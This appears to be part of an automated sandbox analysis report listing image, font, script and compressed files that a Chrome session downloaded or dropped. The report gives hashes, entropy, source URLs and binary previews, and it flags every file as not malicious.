                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 284486
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):83178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9966356720361516
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:sas1AeRdmMaLdPhemAhxicfHwBG7d2KQIH5VKtQ/pv7KkrEKCL9DdxVEqT2StqgB:sas1Ae+MaLdPhemAhxiMH7R2qHjKa/pw
                                                                                                                                                                                                                                                                                          MD5:B55962FF3089751CE9205387F2657AAA
                                                                                                                                                                                                                                                                                          SHA1:8BA2A24AACE703DEABA4DAFA635DDA3D5CE53001
                                                                                                                                                                                                                                                                                          SHA-256:D857AFC0DF8AEFF67FB8237EFA47A060BE672AE9698401254EB82FC3A5CF8807
                                                                                                                                                                                                                                                                                          SHA-512:B10253DA20398A9DB645A735E408158616155FEA017B12D327C0E8FC35E1EE01430F15D9E6B225ADA9E02365F6752782F1A4AF8E36BE32F5261D633C80CA8C63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........}i{Z..w..L.V.h.Kv..4..A..$.P.J.....F.1..mE.....j....s.....5.Z..ZU......|V.v?/....w..(.Z/...w.),EU...........Q././.p.u..bB..............2Z..g....?WC......G...z.z.{.W1.y=..ex.\G.p=_61..i..S....{....N..&,M...ztp?.....S8....Uog..CY....6...Q.x?........$.a..m....&2..u'......p<......."..s.io>..........*Q..,.w.+.....o....m;O.x9.fNm8_.xzA.z.....%Zw.X,.,+.~iq...z%.i...q..$.-.lxn<[..Y..^..?..+.8^.J>\.6.q.v...m..Q}....g..Y.....=..?^....*....'...E...{.:y..<9.*n....I.._...[.u..{~.:m......].._......4.......N.u.k>.....u>....H.~......kq........ ..s.B...WZ,..9am54.0.>.z...v./Af..o.Q..8Z.....9....p<,..*.....(.....V@.>T...f1 lng........PX.....8..Zg4^mo...0H..<.......h2.....g3..=.....Uvv@f.4.....`....N...Z........r.9.X.A...p6..s N......+...'...L.5.Pt......N..U}D4.hh_~.D.0..)..>;....N.?..fio.,~..}......|r7.O&.._..0.w...]...dh.Nv..{5..?V.......s.......}o{.......M...X...j..p.*..q..O)..b.2xcG....`...d...K...x. ..r....`gG......z/.CP.\..HW.W.W.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65418)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):447624
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.553213472934039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:Fznax8eulMYe5TEG00dlXol0VQbQwM87NY0RsEemtJeNmAZzVrfhZxQ8:FjpmFzlq0Ud7zsEemveXbfhL
                                                                                                                                                                                                                                                                                          MD5:22AD6B5597B345523D1F7B6F11660E93
                                                                                                                                                                                                                                                                                          SHA1:8169B8A21AD18583D40D4E37248E25D72B516D6C
                                                                                                                                                                                                                                                                                          SHA-256:7328E3F07833158BA294A64CEB35E773F4F779C82CC78D0278089F07558D71E5
                                                                                                                                                                                                                                                                                          SHA-512:9A95EDF5264C1281EA972A749A1F9B5EC8F06C0E2DF9ABCC46530BF768E3BB4EEA770498EB3C332FF47E3B9C2C0F0B88CA8B8958EEBB22A310D222D173C8611B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"200",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"data.category"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"data.pagename"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",5],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_defaultValue":["macro",5],"vtp_ignoreCase":true,"vtp_map":["list",["map","key",".*\/faq\/*","value","WLC_LP_Faq"],["map","key",".*build-your-web-presence.*","value","WLC_BP_BuildW
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2820
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.900738588343292
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:rGgIbZi/ysPd4BGgPv2g+wQejjwCGfdWT/C5fMtg3t0OTU9slqfnAQGHP3Ugx/NW:6NQyyo5giwV2eiOTUWlwnA5TFW
                                                                                                                                                                                                                                                                                          MD5:1C285791519D01D10A9DDC339C00E9E0
                                                                                                                                                                                                                                                                                          SHA1:E87A6DB2D169E01CFF98F4DB7AB1D2F3E6CEFDD1
                                                                                                                                                                                                                                                                                          SHA-256:83E10BAB9E405D64A960602405BC94E6C66225BA11F406640C2EF8AE6C1B9459
                                                                                                                                                                                                                                                                                          SHA-512:A0421698D9BE40294C510B320875317772D9388FE2E77F07C6157C9C570F680B1B4AF4E0B6A6D084667DFD14314A1F2EA61D79CE6C73611F1C4FEFA1ACD20D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/wbRbWxRbQyojtDDUj_ITsoMZNbSAnroic0AYABmbab8qE-sgODk26wLCYUcJrqW11-I50N3GE6iTCY_Sfa7ud4vMa9fig4YdinEa9w=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{......y.....S...PlE#.RR..F......i.ZK.5U.im.6..4j."h..*.j..u .PCd..G.\....wAW.Xvg..1wu.....y..6.lr.....o.3gf$"..d.+.E.|..].......[.t9..!y....Z[..%.-@....w....o..Tn."..s.-...x...g3...mu..K.[...N.m.~....F.y./....9..\k.Z... T....zx....K.d.p....WrB#......+.....W7.Ks.-.......F.*.....k.E8.[..r.-5N4>..-..U...."Y...h>...@.N.....S.....6t....I,.>...:..1C.. ..2..(c$...]..<....j.k2...A...i.G...=../..........,.4....g...G....l..|..1p...... ........@......8.LV..w.'.U.W...]M..[.. ,.....CY.6t5....l..$../.......l...:.{......8.;.cc.q...X.]]...Dr]F.&..3.Zs...AY.6t5a...@.>;.H.......~..T..l...Z.....:.c..E?...X..:.#(......-v....b..]u9....Q}.k.>;.....2...r}y9N.y..$/7^...4.x..F...6t........E`...kXWs...G...t....]m.n...gs..HX.q.wN...7/bg...e.n..;.............I....._.c.t....L.8...`CW..~...1o...Y......a]...O.R.O.0..l.j...p&>.X.. ...33..L.|..J."...._.6t...n...\..f..D5.g...Us...q.....`CW........x....U..7g=..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2820
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.900738588343292
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:rGgIbZi/ysPd4BGgPv2g+wQejjwCGfdWT/C5fMtg3t0OTU9slqfnAQGHP3Ugx/NW:6NQyyo5giwV2eiOTUWlwnA5TFW
                                                                                                                                                                                                                                                                                          MD5:1C285791519D01D10A9DDC339C00E9E0
                                                                                                                                                                                                                                                                                          SHA1:E87A6DB2D169E01CFF98F4DB7AB1D2F3E6CEFDD1
                                                                                                                                                                                                                                                                                          SHA-256:83E10BAB9E405D64A960602405BC94E6C66225BA11F406640C2EF8AE6C1B9459
                                                                                                                                                                                                                                                                                          SHA-512:A0421698D9BE40294C510B320875317772D9388FE2E77F07C6157C9C570F680B1B4AF4E0B6A6D084667DFD14314A1F2EA61D79CE6C73611F1C4FEFA1ACD20D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{......y.....S...PlE#.RR..F......i.ZK.5U.im.6..4j."h..*.j..u .PCd..G.\....wAW.Xvg..1wu.....y..6.lr.....o.3gf$"..d.+.E.|..].......[.t9..!y....Z[..%.-@....w....o..Tn."..s.-...x...g3...mu..K.[...N.m.~....F.y./....9..\k.Z... T....zx....K.d.p....WrB#......+.....W7.Ks.-.......F.*.....k.E8.[..r.-5N4>..-..U...."Y...h>...@.N.....S.....6t....I,.>...:..1C.. ..2..(c$...]..<....j.k2...A...i.G...=../..........,.4....g...G....l..|..1p...... ........@......8.LV..w.'.U.W...]M..[.. ,.....CY.6t5....l..$../.......l...:.{......8.;.cc.q...X.]]...Dr]F.&..3.Zs...AY.6t5a...@.>;.H.......~..T..l...Z.....:.c..E?...X..:.#(......-v....b..]u9....Q}.k.>;.....2...r}y9N.y..$/7^...4.x..F...6t........E`...kXWs...G...t....]m.n...gs..HX.q.wN...7/bg...e.n..;.............I....._.c.t....L.8...`CW..~...1o...Y......a]...O.R.O.0..l.j...p&>.X.. ...33..L.|..J."...._.6t...n...\..f..D5.g...Us...q.....`CW........x....U..7g=..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):44
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5160276412662315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Ul/ygn1ZrFIEbpD7an:UAi1ZYn
                                                                                                                                                                                                                                                                                          MD5:4597EBF072B6E123705160FD4571A540
                                                                                                                                                                                                                                                                                          SHA1:574D9C3C77230531194DDF955F79B4E0A539E458
                                                                                                                                                                                                                                                                                          SHA-256:48860D4FE9F78C8C9D195830988CD52AB17E71C7C0E623383509F5C966A6BF5F
                                                                                                                                                                                                                                                                                          SHA-512:6E975560962FA57B35F7F8EB0B5666F6D48C97BE69080B02E87DCA7FCC3823BDB5E769652A310DEFE4EAD730145E466B42891F3D0DC248D037ACD835772931DE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i1!3i5!4i256!2m3!1e0!2sm!3i707457665!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=21293
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8L..../..?.....v....E...".....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x394, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):53732
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976623625234184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:AA9o4z/XA2o+0GMl8iaKQd+F+//irY6rTpM4VwY+QyeNT2/gtka4/wHhqtarlOwK:QfplD+dMY6RM40neNEG4//tIWAG
                                                                                                                                                                                                                                                                                          MD5:ECA846A72F792ACC118807786418A959
                                                                                                                                                                                                                                                                                          SHA1:0B3CD58BA0CD9C5C0C5B0F1BE35C81EADB3F8B17
                                                                                                                                                                                                                                                                                          SHA-256:0E6F88FE0ABDD1B89C9B7FAE440008E0757FCA908F1237D1D74E951CCF7EDC4E
                                                                                                                                                                                                                                                                                          SHA-512:C4436B31B7D819E1AAEB4E87E9FE387B92C20DF427876CD60930E678FC13F65BA02A24B30D14B0C0568A2872FDD1EFD098BD34BD54D4DBADD68CF0E263ECA839
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/cc/5c/bf79f56840578624b7522fa430cd/gettyimages-1179252601-1.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................H.........................!.1.."AQa.#2q...B.R......3b..$Cr...Sc..s....4.........................................................!1A.."Qa.2.Bq.#.................?.....Z.)K.W.8B^]{..^.B.yu....cmB..U...e.qP..+.i|V.j.C....-jV..v.1J..H.CJ...+..hc...qZ.P.R...^JL....Z.qZb......+.vA3.jb..\T..u...+.j....4t.ex....u..8".V.c...aN...5...X.N<...P.p.....YX*.i.l....g...B..l.B..b.A..[y4..m...l!..t...D...(.+p+...0W5Fx.....6.{U.3aMrG.O....n!O..A..XpW$s...C.....D..iD...C=?.,{y.^.c.R. <.v.$.H.B...^.........B......f..7..n..5{..A......M...n..{x...Q.m.@E..\p>q\.q.\......".......q.z\.A..l..M. e.fX..',O....r..1.=.!YZ.&.gF1H..!.:..89e....@..jR.D,)Lu.%..u.2...CS.iQJ..O.T.]0..b..F..}d......;~......1.q@...#l..F........e.EI;..'...|...r....2..A.~..g...f8.;V.wN.h.5..M...<{!G2s.+#...e.r.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1536
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.760721830205145
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:ActqT6R5b3CJtmqZd217m9RBjO11NHymcS6fh8QZiZwLaAat5LnZXsY8Spf2ggng:5FSJtTj2165CPFe5cODCLZc1v6SU
                                                                                                                                                                                                                                                                                          MD5:118E3DD544872C1830F991803A9D9A87
                                                                                                                                                                                                                                                                                          SHA1:D7A4B80C1BCB652432DE878F08A5FD77FDAFEF74
                                                                                                                                                                                                                                                                                          SHA-256:4C3D60106FE7E3BC4D771430CFED1387D1E5CCF3AB5819827E38D6A560F47003
                                                                                                                                                                                                                                                                                          SHA-512:D0C6E9A279804C8EA92C3BE39B8256312A6599FB32481C126171DC018251910BD49CD529FC2D2C2C28870355EB129CC315F94FFD6C952EF34B42F6BE1DB90C7A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/45/95/25da6c744690b39141c47a159632/handshake-24dp.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...`...`......w8....sRGB.........IDATx^.\...0..;.p2x'.N....B6....iKWBzl[.f.K........V...!`s.<.<.lF`..'...6#.Y....)._..._^.....U......U...Mo.gg...8....R,dd.0.0.=...(..B.....B..I{e.....2......Tr......T._. dH..../!..I.:B.".....4..p*......~. .....Q...~.#..6.V.e.W.<JI.Q.U^..[.y.>...!.I..|d.[.l"t.I`......D.'...k..I.J...(..~...:..HX% ....B@&...h...% ...../..;.'x...`.L3m@.}.`%`..&.B...K...........3..$.S..#..3.."A;Y.5...f.X.b,K...@..jO..+..$....._..s.9...).$h......E4.=....Q.<.....7".....k$h>x...HC]=.......`.{..g.....Z......{S.|<S..Pq.|,.'....G/@P..g...X..k.......d..NP;....`i^.a=.=..R.,~ r....G.....~M..hr.....>z^.F........`1.pO...o.3"...G.L#.3Dh2.r...E.,z....+....8..].[].....s..,`._FO.(+.....Q.N@..6....].".9..[.fP....4...%A.?nX.....Q.|y.\=,.q;.......Y.,......_..-..7....Q3...*.@V..A{ ...6..~...,rQ...../.f.....n.E..i..^.`.oGk....Uv...:A.c...|..f.R....].,.$g$h.d.......gK..A....Y.H...\....z.0...:..V.:j.)3=. MX.l.X~..Q.<. ....-A...SWY....%@......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 34184, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):34184
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99444009565784
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:8pJf8lXHzTyT3P9QWCHmzL3WbHPBBWQfIKkydgMbG48B/u:u0lDTyrKWCHeL3OBDwKdmp9u
                                                                                                                                                                                                                                                                                          MD5:1ACA735014A6BB648F468EE476680D5B
                                                                                                                                                                                                                                                                                          SHA1:6D28E3AE6E42784769199948211E3AA0806FA62C
                                                                                                                                                                                                                                                                                          SHA-256:E563F60814C73C0F4261067BD14C15F2C7F72ED2906670ED4076EBE0D6E9244A
                                                                                                                                                                                                                                                                                          SHA-512:808AA9AF5A3164F31466AF4BAC25C8A8C3F19910579CF176033359500C8E26F0A96CDC68CCF8808B65937DC87C121238C1C1B0BE296D4306D5D197A1E4C38E86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............X......................................4?HVAR.k.`?STAT..'...J/<.....`..(..Z.0..N.6.$.... .....K..[O;q..w....z.....%.O.t'*.R...*.6.{..@.k......C.B..Z.uU.}..!.".....]jK.`&.\..4...US.......x..C...1g.:.+.?.t<....J...C.p.c..J...........V..H1.6.~..n.]~"R*>..s....7....FE1.S/m....}..<....M..IHB.._8.d.3"......8..t.;f._~X.A.&n.1..t..v...n.._............eS.......!V."v6.xm|M..O.z..,....,...N.1......y^7...^^.$.!.$<V..B....."j..!2..Y"..{w!..Z.[...]H....*M-.*".8j.<..X.[{..UI....ML.J.?4B.....]..4..()^Bi.4iD/..]....../I.-.J[D...........c...)63.U.rFpW5}.9$..2...t..:.MW.c.N...lK...3^......./..v. !...;..v.w./^S...\U....|.......Y9...a.z.....i..$J.U...Ks....0Q*.........iy.....M..@..........&..c.kh.(<.O.....~..#.-.gfw.t...nbo...]0'G.!.2.8....y.K..;%......_).W..?.'.DTR.H....G.Al..d......g>.6..(.."4l...3$...\_.W}..R...\.o........`..q...@XG.wpN......!....&...\.&.....N..5..n......g..bR......HV...s...e..r.0ty&.SW.j.{I...".m .s..T....l....@th:..aM.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4073
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.92772253470979
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:SunauWhJa4yoBws7hY2lhu6gbDxh9u4RsiqNuXGbw2BAb:SuaBJooBw0hYMxg/9JRmcYwf
                                                                                                                                                                                                                                                                                          MD5:E5C929235F8F62A5D32C0C79F908D254
                                                                                                                                                                                                                                                                                          SHA1:DB829D0F15D091968B777862562734133A13CFB6
                                                                                                                                                                                                                                                                                          SHA-256:FC32AD718A8904720E20A4BA7302E4D0E1D8A8354B9F7D67875222CEB74B8EBD
                                                                                                                                                                                                                                                                                          SHA-512:450540743712825ACCD771E24B16D7974E2570FA1806F8304842052DAC0AA6918478C8072CB173E2EEA0B817946442E825F2005BB49A65147E14DE6FD19585F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/UqZcYFgfFclRU46MshhuCQD79idBZ8hyIe5WkQ1VLzG47w-Mgu6yGriGkL_YiYF2qau5jrufzTNwFp84tw7Lm-f9t2vQLkrECfur=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{t....?........<......I...J.z..*.....S...............Z...............i..@"&..G0.........q.....0.sr8'.f........o~........................Ed:.;..G(....B0>.kI....7...0.O..Q...5....Z....c..A.L.2.n......NZ....\.<..8.pp..M..|....+...|5.Vc{...@...li.>Y..^N:.......4.qDF....3....,...gw.{:...j......Vl...R....E5.t.(...4.}5..@..L....P..,.t.?..V&...Bp(s...8......T<A...r..j..>;.}.z....U..\I.@.O...7O..y....Yu.{.....j.W".....T........#7.....Gm..j.......#2A.....*.9s..=N..9*..2..L......<[..../..s.!.=.+..\).G.......8..Q2..Bn....|e.>..FU.."su?.;....(y...R2QJJ>........q..a@e..&.Cr3..z.....jG.t.xH-.@..)\..-?{.k..P.i@e..".mQ......ox.3rO.x<.~.R<.~.{...z..(..<D...pM+..v\>.b..#......|.............O..l..=F+h.'...X!`.0..Y)....p...O.....P....P.@ok.....&.j....U.mW.. &...M1....0...SY#..;HA1..?.x..Q.~.aR.B.........T.n..=.$.<h......R..4...}...i..h.+Y.E.K!.e:.....m.x.o./..o......R.1.TAU.m..v.]..5....Z.R....-.....:.'m<.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16396, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16396
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985827035156134
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:Lha7McMVhiB+XmITjsy+wHXjov+sc8idzmAKUcLIS:Va7McSPXpjsy+wHzu+nZdKDUcLr
                                                                                                                                                                                                                                                                                          MD5:A2EDB5C7EB3C7EF98D0EB329C6FB268F
                                                                                                                                                                                                                                                                                          SHA1:5F3037DC517AFD44B644C712C5966BFE3289354C
                                                                                                                                                                                                                                                                                          SHA-256:BA191BF3B5C39A50676E4ECAE47ADFF7F404F9481890530CDBF64252FBB1A57E
                                                                                                                                                                                                                                                                                          SHA-512:CC5644CAF32302521CA5D6FD3C8CC81A6BBF0C44A56C00F0A19996610D65CF40D5BAE6446610F05A601F63DEA343A9000E76F93A0680CFBF1E4CF15A3563A62C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......@...........?...........................<..l..:.`..:........d.....6.$..(. .....N.....5x.-.v.?..,...<Sn..O/.<.... ......{r2D!v@..?...."..F..\3...-5B....x.).x.$ze._c.l.)~Y..YE.J.e.uW.%).?..T.].q_7y.4...$....*t.F #t8.j...GO..k..&.Ecb.X..m#.........k.s.Fr...<q~.@].PHN?..w.h.f...!h..A,H......*H.R.T.R.*......)...m..}u...".)(J.......>!. .V-....E^.bQ.....U.....u.s?$3.L$...y.........LpB.H.=...."R]|=..._.o..W....N.j2.L.D.....{.<..s.W1I. zHx:..I.......G..~.6..E.&I4.J..h.Y...uM..D.z.u*..)......<...T.......U...k...O......C.!vCy....&..y......t....e...(#.......%v..;.XTS...,....A.w.....K...vv.AI..~y..t..f.....D!...h.."e...h.pQ..{...\..G.......K.[.R....{.%]].0...!i.. ....w..*....4...*`G.2...GD.wZV"...I.......tGQ.<..d..P...o.{......].hI#.....(..0_d..%....E.....?.|...)...U.*"b....1bT.....~.U.[.NJ%....h*W....s.;.Vm.}]..2............<...|q.yW.x....sar!.J. .D...z..GcH.~k.r. >..kY...$2D..B@0.5.6.:...T.xr.~. `M...;.?..b6.Puc,.P.....F.pU.a.f_.xS.....IV.r~......6"..AX.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2583
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898641511390697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:QidnNIUVi6bOsyJAChX1jcF9QAXQYT0rx4R:rnqUVrbOyCEz0YSY
                                                                                                                                                                                                                                                                                          MD5:33AC77B409EC3AEDF40FB11C025AB7B6
                                                                                                                                                                                                                                                                                          SHA1:AECC10D7A81A9EE2574EF5D1A410236C2463E659
                                                                                                                                                                                                                                                                                          SHA-256:C55C9756F61B6EDD413945E504C6FEE33242F35904EB525EBFA872EA7F499FA1
                                                                                                                                                                                                                                                                                          SHA-512:C8D2596E596F4DB9C9152C70D367AB4D4C2F37FBCC9F1CAF707E025B54258D85D3E1F7A36EE5E3217B70EFCC1486BF0005DDEB8F2500049B67BBDF84BCC4FF08
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..k.]U...k.s...ig:HKE. .G....Q.D .................O .cbb4.......+........a..L;m.u...p...wf.6.+.3...^............R....u6.....n`....}.....+f.iP..F*....qQ..1.......7..Y...qA.z..f.}..5.........s....$c..<...b..:]N..l[/..?m.q.E......;..*,.&.Wi.4..a.r..uS.........a....b.++)...V...|..Z.....Ip....._.8.HTW......K..+x......%>}q...8...F....PDU....|i.z..>@..S;5.b.Z.z.35V%..a.E. ........0.V....e..PE.Jc..D2...?.&...H......>3..S.@.J.%T.!2^....u.o..~,.$....y.h....V.2..\.}..2....y&qqLk..kS]..BP..3@.....GS..D.w...6.....W+J!.rG......K..D...-@.j...D..B1`5!R........D...v..........K...@D..?Zh..p....z.Z._.s..'w.....j^.".5........J.os...=x.....U8+..$B..V.B.3.G..!......(...l..[..4...GH v1....8_un.....sh.B..$.s.w._@. ....s.l..}.Q\.J..\.J..-...Hb...2t..S...(V.e..I..nl.f....D.0......."z?tI..^.g.10u.aGF0.....P....'..Ede'.Q...xk.....c{Pv>........+Ox..].\.....25...(l:..K+..O.......la.(.Q.7.f...E.7..x..H..<....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1366
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.691383605236124
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:AXfRSOvVfz9i4aYnlzzM/gC5L17rEdMC44W+KrFPazxG:YF79tlzz7GdEMC4XvxOG
                                                                                                                                                                                                                                                                                          MD5:96749937F159FC2ED45E2E2733F439FE
                                                                                                                                                                                                                                                                                          SHA1:C6F5FA809B17F9FC2EF50ECEC28BB257209BE6BE
                                                                                                                                                                                                                                                                                          SHA-256:71BD8D7C6185CBF1E744B627B3BAAC348F610AE8DD7DDC73410FD23400D72E8D
                                                                                                                                                                                                                                                                                          SHA-512:C9D5681E1D40587B111F1D82491CF15BDE88A863400772A7A4EFE0F0FEF759DF5D0EA12AAC7A915AE421C83C2448EC01608727D9C6ADFA93298231D0385D5E16
                                                                                                                                                                                                                                                                                          Malicious:false
